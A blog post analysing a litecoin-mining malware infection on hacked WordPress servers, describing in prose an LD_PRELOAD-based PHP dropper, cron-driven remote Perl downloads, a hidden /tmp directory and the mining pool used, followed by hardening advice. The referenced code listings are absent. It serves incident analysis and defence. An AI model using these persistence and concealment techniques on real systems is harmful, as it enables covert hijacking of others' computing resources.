Antonio Angelino

Antonio Angelino


August 2017
MTWTFSS
« Nov  
 123456
78910111213
14151617181920
21222324252627
28293031 

Categories


Bitcoin mining malware, analysis of an infection

Antonio AngelinoAntonio Angelino

When an attacker manages to compromise and get root access to a server or your notebook, his main goal usually is to steal sensitive information, to use it as a bridgehead for attacking other targets, to send spam or deny a service for causing money losses.

When I started my sysadmin career path, more than ten years ago, almost all software exploits were used with the previous explained goals in mind, but something is changing since the crypto-currencies have begun to spread and gain real value.

Bitcoin is the most famous crypto-currency nowadays. Bitcoins can be obtained in exchange for legal currencies (dollar, euro, yen, yuan and so on) or as a reward for payment processing work, in which you offer your computing power to verify and record payments into the public ledger. This activity is called mining and is rewarded by transaction fees and newly created bitcoins.

Bitcoin mining requires a huge amount of computation power, so miners usually create computing clusters for being able to generate them. Mining clusters can be heterogeneous: any kind of digital appliance connected to the Internet is a good candidate for joining the cluster. More powerful is the appliance CPU (or GPU), more valuable is the appliance itself.

Attackers are starting to make profit by gaining access to servers, notebooks, smartphones or even simple appliances (smart washing machines, refrigerators, televisions, CCTV security cameras and so on) and stealing CPU/GPU cycles for mining crypto-currencies.

Mining bitcoins by using low-end CPU is quite impossible nowadays, but there are other crypto-currencies that are easier to mine compared to bitcoins. That’s why attackers has been targeting litecoin and dogecoin, which are literally a million times easier to mine.

Trend Micro found a mining malware in several Android apps, a couple of which were listed in the official Google Play store and they have been downloaded by millions of users.

Johannes Ullrich realized that there was a network of CCTV security cameras that were being used to mine for dogecoin.

You can usually notice a mining malware on a smart phone due to the loss of performance or its “puzzling” overheat, but you may not recognise a similar issue on a modern multicore/multi-socket server. Mining malware tend to keep a low profile; even if a mining malware uses the 100% of one core of a 12-core CPU, it’s only using the 8% of the whole CPU power and it may not be noticed.

Analysis of a mining malware infection

I found the previously described scenario during two security audits requested by two different clients. There were more than 20 servers used for mining litecoins, all hacked using the same technique.

All hacked servers hosted vulnerable WordPress platforms, they have been used to download and execute the following malicious PHP script.

The script contains an ELF malware library inside the $so32 variable (I removed it), it was used to change how /usr/bin/host acts. You can see how the attacker “prelinks” (LD_PRELOAD) a bogus libworker.so before launching /usr/bin/host (a legitimate and clean system binary) by checking the highlighted line #37.

The attacker seems to use /usr/bin/host as a cron fallback if cron access is denied.

The main features of this script are:

After a successful execution of the previous script, the server crontab of the audited servers looked like the following one:

Thanks to the first cron task, a remote PERL script was downloaded every 10 seconds. This is the source code of the last downloaded PERL script:

The script executes some cleanup tasks, checks the server environment, creates a hidden directory inside the /tmp directory called “.ice-unix” and then it downloads and extracts a tar.gz file that contains the minerd software. The last script command configures and executes the parasite mining software.

The miner joins a mining pool, called “wemineltc”, through the stratum protocol and it uses a random username between “spdrman.0” and “spdrman.11”.

The malware tries to camouflage itself by :

By checking the web server logs and the creation date of several files and directories, I discovered that the parasite mining processes had been run for 3/4 months and no one noticed it!

How to prevent similar threats?

You should keep updated all Operating System and user applications, do system hardening and schedule weekly security checks, because checking a global dashboard with overall resource statistics and installing rkhunter or similar tools doesn’t guarantee that your servers don’t become zombies manipulated by a remote puppet master.

Entrepreneur, Manager, Cloud Engineer.